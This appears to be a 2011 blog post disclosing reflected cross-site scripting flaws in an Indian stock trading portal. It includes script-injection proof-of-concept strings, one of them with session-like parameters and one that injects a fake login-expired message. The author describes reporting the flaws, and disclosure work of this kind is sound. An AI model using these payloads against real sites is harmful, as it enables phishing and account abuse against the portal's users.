Wednesday, July 20, 2011

Multiple XSS Vulnerabilities in Sharekhan trading Portal ( )

Vulnerability Description:

Sharekhan (an Indian stock trading portal) lets its users trade in the stock market and manage their DP accounts. Being in the finance domain, it should be secure and vulnerability-free, but its online portal “” contains multiple XSS (cross-site scripting) vulnerabilities that can be used against the site's users for phishing and information gathering, and can lead to financial losses for them. I have tried to contact Sharekhan but have not received any positive response yet, so I have reported these vulnerabilities to the for further action and coordination with the Sharekhan site administrator.

These are fairly simple to discover & exploit.

Type of vulnerability: Input validation (XSS)

Product: Sharekhan trading Portal


(User login Required )<script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512


(User login is not required) pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&

